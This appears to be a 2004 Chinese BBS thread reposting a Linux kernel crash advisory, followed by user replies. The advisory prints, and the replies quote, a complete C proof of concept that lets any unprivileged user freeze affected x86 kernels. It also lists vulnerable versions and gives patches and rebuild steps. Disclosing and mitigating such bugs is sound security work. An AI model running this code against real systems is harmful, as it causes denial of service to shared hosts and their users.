荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: cycker (four), 信区: Linux
标 题: [合集]Linux内核的又一严重bug. zz
发信站: 荔园晨风BBS站 (2004年10月16日23:28:15 星期六), 转信
☆ 1 ──────────── 我是分割线 ─────────────────☆
发信人: pigworlds.bbs@bbs.sjtu.edu.cn (Have fun), 信区: Linux
标 题: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 10:48:36 2004
linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都会
受到影响. 更详细的分析和补救方法请参见:
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
New Kernel Crash-Exploit discovered
Published 2004-06-11 by xiando, v2.2.1, last updated 2004-06-14.
A bug lets a simple C program crash the kernel, effectively locking the
whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
* The Evil Code
* The Crashing Kernels
* The safe kernels
* The threat
* How to protect yourself
o Patch for 2.4.2x Kernels
o Kernel 2.4.26-rc3-gentoo
o 2.6.xx kernels
o amd64
o Fedora Core 2
* Bug reports
The Evil Code
Running this simple C program crashes the Linux kernel.
crash.c.txt
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void Handler(int ignore)
{
char fpubuf[108];
__asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
This bug is confirmed to be present when the code is compiled with GCC
version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
versions 2.4.2x and 2.6.x on x86 and amd64 systems.
The Crashing Kernels
Minor numbers are versions verified, this is just the top the iceberg:
* Linux 2.6.x
o 2.6.7-rc2
o 2.6.6 (vanilla)
o 2.6.6-rc1 SMP (varified by blaise)
o 2.6.6 SMP (verified by riven)
o 2.6.5-gentoo (verified by RatiX)
o 2.6.5-mm6 - (verified by Mariux)
o 2.6.5 (fedora core 2 vanilla)
o 2.6.3-13mdk (Mandrake)
* Linux 2.4.2x
o 2.4.26 vanilla
o 2.4.26, grsecurity 2.0 config
o 2.4.26-rc1 vanilla
o 2.4.26-gentoo-r1
o 2.4.22
o 2.4.22-1.2188 Fedora FC1 Kernel
o 2.4.20 RH7.3 (gcc 2.96)
o 2.4.18-bf2.4 (debian woody vanilla)
Even grsecurity-patched kernels crash. "I would have hoped that grsec would
have blocked or logged something, but nothing appeared in the logs." Vincent
The safe kernels
This code does nothing but exit with the error message Floating point
exception and can not do any damage to systems running
* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* 2.2.19-kernel
It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
safe. Other versions of the Gentoo kernel are not.
The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
versions of user mode Linux are safe.
Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
uses a version patched with Con Kolivas Staircase scheduler (but it only
affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
left the crash program 10 minutes and after that i killed the task and I
continued using my system". Guille
The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
later.
The threat
Using this exploit to crash Linux systems requires the (ab)user to have
shell access or other means of uploading and running the program (like
cgi-bin and FTP access). The program works on any normal user account, root
access is not required. This exploit has been reported used to take down
several "lame free-shell providers" servers (running code you know will
damage a system intentionally and hacking in general is illegal in most
parts of the world and strongly discouraged).
This code only works on x86 Linux machines. This code does not compile
(makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
doesn't affect NetBSD Stable.
SMP systems can be compromised, but a separate instance of the program is
required for each CPU before the system halts. Each instance of the program
code will lock one CPU and this process can not be killed. If you have two
CPUs the second instance of the program kills the entire machine.
Check your own system yourself if you are wondering if this affects you.
Better safe than sorry. Assume it will crash, sync (even unmount) your file
systems before testing. If your system is a production server with 1000 on
line users then do not test this code on that box.
How to protect yourself
The last days were frustrating. Compiling a large number of different
kernel versions just to find that gcc crash.c -o evil && ./evil halts the
system is quite dull. I hoped some kernels would be unaffected because
2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
versions die when evil is executed.
The Linux Kernel mailing list is found to the right of this article. You
may find solutions there not mentioned on this page. The author does
subscribe and plans to post (better) solutions here as they appear.
Patch for 2.4.2x Kernels
There are two patches available, both of them work with 2.4.xx kernels:
* 2.4.26_i387.h_patch.txt
* signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
2.4.26_i387.h_patch.txt is recommended. This patch was committed to
BitKeeper by the legendary hero Linus Torvalds.
When this patch is applied evil will not do any damage, but it will keep
running at 99% CPU until it is killed (like any other process). This is a
general fix for root cause of the flaw evil exploits. The signal.c patch is
more specific to evil and makes the program exit instantly. This approach
works, but it is not a very beautiful solution.
Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26,
the signal.c patch is also tested with 2.4.21.
Follow these steps to get a safe vanilla kernel:
1. Read the Kernel Rebuild Guide if this is your first time compiling
your own kernel
2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your
local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd /usr/src/
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26:
5. Apply the patch 2.4.26_i387.h_patch.txt
* patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
6. Configure and compile as usual.
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to call your new kernel something else and edit
Grub or Lilos configuration.
The patches should apply cleanly to other 2.4.xx versions.
Kernel 2.4.26-rc3-gentoo
2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
I have no idea why this kernel version is safe from this exploit. It just
is. This kernel patch set returns Floating point exception instead of
locking the system when evil is executed.
This kernel can be used on any Linux system. It does not require any
Gentoo-only tools.
General advice: It is a bad idea to use kernels and patches from unknown
sources. You should only use software from trusted sources. I know this
patch set is safe ? you do not, and you should not take a strangers word
when it comes to security.
1. Read the Kernel Rebuild Guide if this is your first time compiling
your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2)
aka 2.4.26_pre5:
* wget http://re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd /usr/src/
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d /usr/src/linux-2.4.25
<gentoo-sources-2.4.26_pre5.patch
6. Rename the kernel and make a symlink from /usr/src/linux:
* mv linux-2.4.25 linux-2.4.26-rc3-gentoo
* ln -s linux-2.4.26-rc3-gentoo linux
7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
because the original Gentoo ebuild changed the version in the Makefile or
another configuration file to make these match. Open the Makefile in your
favorite editor and and change line 4 to say -rc3-gentoo:
* cd linux-2.4.26-rc3-gentoo
* nano -w Makefile
* "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
8. Configure your kernel
* Using your old config: cp /usr/src/linux-oldversion/.config
.config && make oldconfig
* The Linux kernel can be configured with make menuconfig (CLI)
and make xconfig (GUI)
9. Compile your new kernel and install as usual:
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to call your new kernel something else and edit
Grub or Lilos configuration.
Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
2.6.xx kernels
A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
Ballarin
It is tested successfully on Linux-2.6.7-rc2 by yours truly.
The i387.h patch seems to be the best solution. When evil is executed it
does not freeze the system, but unlike the other alternative patches it
does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
and killall.
1. Read the Kernel Rebuild Guide if this is your first time compiling
your own kernel
2. Get a kernel from kernel.org and unpack it to /usr/src
3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
5. Follow the usual steps.
Other solutions:
* Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
mail list available at
o PATCH fix for Re: timer + fpu stuff locks my console race.
o http://lkml.org/lkml/2004/6/12/88
o Raw message: andi_kleen_patch.txt
* Stian Skjelstad's patch also works with 2.6.7
o http://lkml.org/lkml/2004/6/12/64
* Sergey Vlasov has a solution at
o http://lkml.org/lkml/2004/6/12/81
amd64
At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is affected as
well. The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The
file that needs the change is include/asm-x86_64/i387.h".
Dan Hollis mailed this comment: Contrary to the claims on (this page),
x86_64 is immune from this exploit -- as long as the binary is built as
x86_64 and not ia32.
Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
$ file crash
crash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for
GNU/Linux 2.4.0,
dynamically linked (uses shared libs), not stripped
$ ./crash
...........................*....................
[... continues for some minutes ...]
control-c
$
System still up and running smoothly, zero problems. Actually even
compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just jacks up the
tty you run the binary in. The rest of the system runs fine. -Dan
Fedora Core 2
Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update
Notification FEDORA-2004-171 2004-06-14)
sudo yum -y update kernel*
will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.
Bug reports
* The exploit was reported as gcc bug 15905 2004-06-09.
* This is reported to the linux-kernel list with the subject timer +
fpu stuff locks my console race.
* Reported to Gentoo Bugzilla as bug 53804
☆ 2 ──────────── 我是分割线 ─────────────────☆
发信人: cycker (风吹不散笑容), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 11:12:37 2004
刚实验过,这是真的.........
【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
: 需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都会
: 受到影响. 更详细的分析和补救方法请参见:
: http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
: New Kernel Crash-Exploit discovered
: Published 2004-06-11 by xiando, v2.2.1, last updated 2004-06-14.
: A bug lets a simple C program crash the kernel, effectively locking the
: whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
: * The Evil Code
: * The Crashing Kernels
: * The safe kernels
: * The threat
: * How to protect yourself
: o Patch for 2.4.2x Kernels
: o Kernel 2.4.26-rc3-gentoo
: o 2.6.xx kernels
: o amd64
: o Fedora Core 2
: * Bug reports
: The Evil Code
: Running this simple C program crashes the Linux kernel.
: crash.c.txt
: #include <sys/time.h>
: #include <signal.h>
: #include <unistd.h>
: static void Handler(int ignore)
: {
: char fpubuf[108];
: __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
: write(2, "*", 1);
: __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
: }
: int main(int argc, char *argv[])
: {
: struct itimerval spec;
: signal(SIGALRM, Handler);
: spec.it_interval.tv_sec=0;
: spec.it_interval.tv_usec=100;
: spec.it_value.tv_sec=0;
: spec.it_value.tv_usec=100;
: setitimer(ITIMER_REAL, &spec, NULL);
: while(1)
: write(1, ".", 1);
: return 0;
: }
: This bug is confirmed to be present when the code is compiled with GCC
: version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: versions 2.4.2x and 2.6.x on x86 and amd64 systems.
: The Crashing Kernels
: Minor numbers are versions verified, this is just the top the iceberg:
: * Linux 2.6.x
: o 2.6.7-rc2
: o 2.6.6 (vanilla)
: o 2.6.6-rc1 SMP (varified by blaise)
: o 2.6.6 SMP (verified by riven)
: o 2.6.5-gentoo (verified by RatiX)
: o 2.6.5-mm6 - (verified by Mariux)
: o 2.6.5 (fedora core 2 vanilla)
: o 2.6.3-13mdk (Mandrake)
: * Linux 2.4.2x
: o 2.4.26 vanilla
: o 2.4.26, grsecurity 2.0 config
: o 2.4.26-rc1 vanilla
: o 2.4.26-gentoo-r1
: o 2.4.22
: o 2.4.22-1.2188 Fedora FC1 Kernel
: o 2.4.20 RH7.3 (gcc 2.96)
: o 2.4.18-bf2.4 (debian woody vanilla)
: Even grsecurity-patched kernels crash. "I would have hoped that grsec would
: have blocked or logged something, but nothing appeared in the logs." Vincent
: The safe kernels
: This code does nothing but exit with the error message Floating point
: exception and can not do any damage to systems running
: * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
: * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
: * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
: * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
: * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
: * 2.2.19-kernel
: It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
: safe. Other versions of the Gentoo kernel are not.
: The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
: versions of user mode Linux are safe.
: Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
: uses a version patched with Con Kolivas Staircase scheduler (but it only
: affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
: left the crash program 10 minutes and after that i killed the task and I
: continued using my system". Guille
: The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
: The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
: later.
: The threat
: Using this exploit to crash Linux systems requires the (ab)user to have
: shell access or other means of uploading and running the program (like
: cgi-bin and FTP access). The program works on any normal user account, root
: access is not required. This exploit has been reported used to take down
: several "lame free-shell providers" servers (running code you know will
: damage a system intentionally and hacking in general is illegal in most
: parts of the world and strongly discouraged).
: This code only works on x86 Linux machines. This code does not compile
: (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
: doesn't affect NetBSD Stable.
: SMP systems can be compromised, but a separate instance of the program is
: required for each CPU before the system halts. Each instance of the program
: code will lock one CPU and this process can not be killed. If you have two
: CPUs the second instance of the program kills the entire machine.
: Check your own system yourself if you are wondering if this affects you.
: Better safe than sorry. Assume it will crash, sync (even unmount) your file
: systems before testing. If your system is a production server with 1000 on
: line users then do not test this code on that box.
: How to protect yourself
: The last days were frustrating. Compiling a large number of different
: kernel versions just to find that gcc crash.c -o evil && ./evil halts the
: system is quite dull. I hoped some kernels would be unaffected because
: 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
: versions die when evil is executed.
: The Linux Kernel mailing list is found to the right of this article. You
: may find solutions there not mentioned on this page. The author does
: subscribe and plans to post (better) solutions here as they appear.
: Patch for 2.4.2x Kernels
: There are two patches available, both of them work with 2.4.xx kernels:
: * 2.4.26_i387.h_patch.txt
: * signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
: 2.4.26_i387.h_patch.txt is recommended. This patch was committed to
: BitKeeper by the legendary hero Linus Torvalds.
: When this patch is applied evil will not do any damage, but it will keep
: running at 99% CPU until it is killed (like any other process). This is a
: general fix for root cause of the flaw evil exploits. The signal.c patch is
: more specific to evil and makes the program exit instantly. This approach
: works, but it is not a very beautiful solution.
: Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26,
: the signal.c patch is also tested with 2.4.21.
: Follow these steps to get a safe vanilla kernel:
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your
: local Linux Kernel Mirror
: 3. Unpack the kernel source and make a symbolic link:
: * cd /usr/src/
: * tar xfvj linux-2.4.26.tar.bz2
: * ln -s linux-2.4.26 linux
: 4. Download the patch for 2.4.26:
: 5. Apply the patch 2.4.26_i387.h_patch.txt
: * patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
: 6. Configure and compile as usual.
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: The patches should apply cleanly to other 2.4.xx versions.
: Kernel 2.4.26-rc3-gentoo
: 2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
: patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
: I have no idea why this kernel version is safe from this exploit. It just
: is. This kernel patch set returns Floating point exception instead of
: locking the system when evil is executed.
: This kernel can be used on any Linux system. It does not require any
: Gentoo-only tools.
: General advice: It is a bad idea to use kernels and patches from unknown
: sources. You should only use software from trusted sources. I know this
: patch set is safe ? you do not, and you should not take a strangers word
: when it comes to security.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
: 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2)
: aka 2.4.26_pre5:
: * wget http://re.a.la/gs (2,2M)
: 4. Unpack the 2.4.25 kernel source:
: * cd /usr/src/
: * tar xfvj linux-2.4.25.tar.bz2
: 5. Apply the Gentoo patchset:
: * patch -p1 -d /usr/src/linux-2.4.25
: <gentoo-sources-2.4.26_pre5.patch
: 6. Rename the kernel and make a symlink from /usr/src/linux:
: * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
: * ln -s linux-2.4.26-rc3-gentoo linux
: 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
: compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
: because the original Gentoo ebuild changed the version in the Makefile or
: another configuration file to make these match. Open the Makefile in your
: favorite editor and and change line 4 to say -rc3-gentoo:
: * cd linux-2.4.26-rc3-gentoo
: * nano -w Makefile
: * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
: 8. Configure your kernel
: * Using your old config: cp /usr/src/linux-oldversion/.config
: .config && make oldconfig
: * The Linux kernel can be configured with make menuconfig (CLI)
: and make xconfig (GUI)
: 9. Compile your new kernel and install as usual:
: * make dep bzImage modules modules_install
: * mount /boot (some distributions mount /boot on startup)
: * cp arch/i386/boot/bzImage /boot
: * You may want to call your new kernel something else and edit
: Grub or Lilos configuration.
: Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
: 2.6.xx kernels
: A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
: 2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
: Ballarin
: It is tested successfully on Linux-2.6.7-rc2 by yours truly.
: The i387.h patch seems to be the best solution. When evil is executed it
: does not freeze the system, but unlike the other alternative patches it
: does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
: and killall.
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Get a kernel from kernel.org and unpack it to /usr/src
: 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
: 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
: 5. Follow the usual steps.
: Other solutions:
: * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
: mail list available at
: o PATCH fix for Re: timer + fpu stuff locks my console race.
: o http://lkml.org/lkml/2004/6/12/88
: o Raw message: andi_kleen_patch.txt
: * Stian Skjelstad's patch also works with 2.6.7
: o http://lkml.org/lkml/2004/6/12/64
: * Sergey Vlasov has a solution at
: o http://lkml.org/lkml/2004/6/12/81
: amd64
: At Gentoo bug #15905 Ballarin Marc writes "IMPORTANT: amd64 is affected as
: well. The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The
: file that needs the change is include/asm-x86_64/i387.h".
: Dan Hollis mailed this comment: Contrary to the claims on (this page),
: x86_64 is immune from this exploit -- as long as the binary is built as
: x86_64 and not ia32.
: Linux 2.6.6 #1 x86_64 x86_64 x86_64 GNU/Linux
: $ file crash
: crash: ELF 64-bit LSB executable, AMD x86-64, version 1 (SYSV), for
: GNU/Linux 2.4.0,
: dynamically linked (uses shared libs), not stripped
: $ ./crash
: ...........................*....................
: [... continues for some minutes ...]
: control-c
: $
: System still up and running smoothly, zero problems. Actually even
: compiling it as ia32 doesnt _crash_ the x86_64 kernel, it just jacks up the
: tty you run the binary in. The rest of the system runs fine. -Dan
: Fedora Core 2
: Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update
: Notification FEDORA-2004-171 2004-06-14)
: sudo yum -y update kernel*
: will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.
: Bug reports
: * The exploit was reported as gcc bug 15905 2004-06-09.
: * This is reported to the linux-kernel list with the subject timer +
: fpu stuff locks my console race.
: * Reported to Gentoo Bugzilla as bug 53804
☆ 3 ──────────── 我是分割线 ─────────────────☆
发信人: plain.bbs@bbs.cqupt.edu.cn (☆重邮2000☆杨光中), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 11:12:53 2004
编译了,运行了,但是我的内核并没有崩溃。
系统是Fedora Core 1,内核升级到2.6.5
【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
: 需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都会
: 受到影响. 更详细的分析和补救方法请参见:
: http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
: New Kernel Crash-Exploit discovered
: Published 2004-06-11 by xiando, v2.2.1, last updated 2004-06-14.
: A bug lets a simple C program crash the kernel, effectively locking the
: whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
: * The Evil Code
: * The Crashing Kernels
: .................(以下省略)
☆ 4 ──────────── 我是分割线 ─────────────────☆
发信人: cycker (风吹不散笑容), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 11:16:36 2004
你的并不在此列表中吧?
* Linux 2.6.x
: o 2.6.7-rc2
: o 2.6.6 (vanilla)
: o 2.6.6-rc1 SMP (varified by blaise)
: o 2.6.6 SMP (verified by riven)
: o 2.6.5-gentoo (verified by RatiX)
: o 2.6.5-mm6 - (verified by Mariux)
: o 2.6.5 (fedora core 2 vanilla)
: o 2.6.3-13mdk (Mandrake)
【 在 plain.bbs@bbs.cqupt.edu.cn (☆重邮2000☆杨光中) 的大作中提到: 】
编译了,运行了,但是我的内核并没有崩溃。
系统是Fedora Core 1,内核升级到2.6.5
【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
: 需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都会
: 受到影响. 更详细的分析和补救方法请参见:
: http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
: New Kernel Crash-Exploit discovered
: Published 2004-06-11 by xiando, v2.2.1, last updated 2004-06-14.
: A bug lets a simple C program crash the kernel, effectively locking the
: whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
: * The Evil Code
: * The Crashing Kernels
: .................(以下省略)
☆ 5 ──────────── 我是分割线 ─────────────────☆
发信人: jjksam (暂别Windows), 信区: Linux
标 题: Re: Linux内核的又一严重bug. zz
时 间: Tue Jun 15 14:45:40 2004
【 在 pigworlds.bbs@bbs.sjtu.edu.cn (Have fun) 的大作中提到: 】
: linuxreviews报道, Linux内核的又一严重bug被发现. 因为这个bug, 一个普通用户(不
: 需要有root权限) 执行一段小程序便可以使Linux内核崩溃. 大多数2.4和2.6的内核都会
: 受到影响. 更详细的分析和补救方法请参见:
: http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
: New Kernel Crash-Exploit discovered
...
: This bug is confirmed to be present when the code is compiled with GCC
: version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
: versions 2.4.2x and 2.6.x on x86 and amd64 systems.
README中一直都说到
COMPILING the kernel:
- Make sure you have gcc 2.95.3 available. gcc 2.91.66 (egcs-1.1.2) may
~~~~~~~~要用2.95.3来编译内核
also work but is not as safe, and *gcc 2.7.2.3 is no longer supported*.
Also remember to upgrade your binutils package (for as/ld/nm and company)
if necessary. For more information, refer to ./Documentation/Changes.
不知文中所提的出现问题的内核是用哪个编译器编译的呢?我等一会试试, 刚换了个硬盘
系统都重装了.
: The Crashing Kernels
: Minor numbers are versions verified, this is just the top the iceberg:
: * Linux 2.6.x
: o 2.6.7-rc2
: o 2.6.6 (vanilla)
: o 2.6.6-rc1 SMP (varified by blaise)
: o 2.6.6 SMP (verified by riven)
: o 2.6.5-gentoo (verified by RatiX)
: o 2.6.5-mm6 - (verified by Mariux)
: o 2.6.5 (fedora core 2 vanilla)
: o 2.6.3-13mdk (Mandrake)
: * Linux 2.4.2x
: o 2.4.26 vanilla
: o 2.4.26, grsecurity 2.0 config
: o 2.4.26-rc1 vanilla
: o 2.4.26-gentoo-r1
: o 2.4.22
: o 2.4.22-1.2188 Fedora FC1 Kernel
: o 2.4.20 RH7.3 (gcc 2.96)
: o 2.4.18-bf2.4 (debian woody vanilla)
: Even grsecurity-patched kernels crash. "I would have hoped that grsec would
: have blocked or logged something, but nothing appeared in the logs." Vincent
: The safe kernels
: This code does nothing but exit with the error message Floating point
: exception and can not do any damage to systems running
: * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
: * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
: * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
: * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
: * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
: * 2.2.19-kernel
: It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
: safe. Other versions of the Gentoo kernel are not.
: The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
: versions of user mode Linux are safe.
: Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
: uses a version patched with Con Kolivas Staircase scheduler (but it only
: affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
: left the crash program 10 minutes and after that i killed the task and I
: continued using my system". Guille
: The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
: The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
: later.
: The threat
: Using this exploit to crash Linux systems requires the (ab)user to have
: shell access or other means of uploading and running the program (like
: cgi-bin and FTP access). The program works on any normal user account, root
: access is not required. This exploit has been reported used to take down
: several "lame free-shell providers" servers (running code you know will
: damage a system intentionally and hacking in general is illegal in most
: parts of the world and strongly discouraged).
: This code only works on x86 Linux machines. This code does not compile
: (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
: doesn't affect NetBSD Stable.
: SMP systems can be compromised, but a separate instance of the program is
: required for each CPU before the system halts. Each instance of the program
: code will lock one CPU and this process can not be killed. If you have two
: CPUs the second instance of the program kills the entire machine.
: Check your own system yourself if you are wondering if this affects you.
: Better safe than sorry. Assume it will crash, sync (even unmount) your file
: systems before testing. If your system is a production server with 1000 on
: line users then do not test this code on that box.
: How to protect yourself
: The last days were frustrating. Compiling a large number of different
: kernel versions just to find that gcc crash.c -o evil && ./evil halts the
: system is quite dull. I hoped some kernels would be unaffected because
: 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
: versions die when evil is executed.
: The Linux Kernel mailing list is found to the right of this article. You
: may find solutions there not mentioned on this page. The author does
: subscribe and plans to post (better) solutions here as they appear.
: Patch for 2.4.2x Kernels
: There are two patches available, both of them work with 2.4.xx kernels:
: * 2.4.26_i387.h_patch.txt
: * signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)
: 2.4.26_i387.h_patch.txt is recommended. This patch was committed to
: BitKeeper by the legendary hero Linus Torvalds.
: When this patch is applied evil will not do any damage, but it will keep
: running at 99% CPU until it is killed (like any other process). This is a
: general fix for root cause of the flaw evil exploits. The signal.c patch is
: more specific to evil and makes the program exit instantly. This approach
: works, but it is not a very beautiful solution.
: Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26,
: the signal.c patch is also tested with 2.4.21.
: Follow these steps to get a safe vanilla kernel:
: 1. Read the Kernel Rebuild Guide if this is your first time compiling
: your own kernel
: 2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your
: local Linux Kernel Mirror
: 3. Unpack the kernel source and make a symbolic link:
: * cd /usr/src/
: * tar xfvj linux-2.4.26.tar.bz2
: * ln -s linux-2.4.26 linux
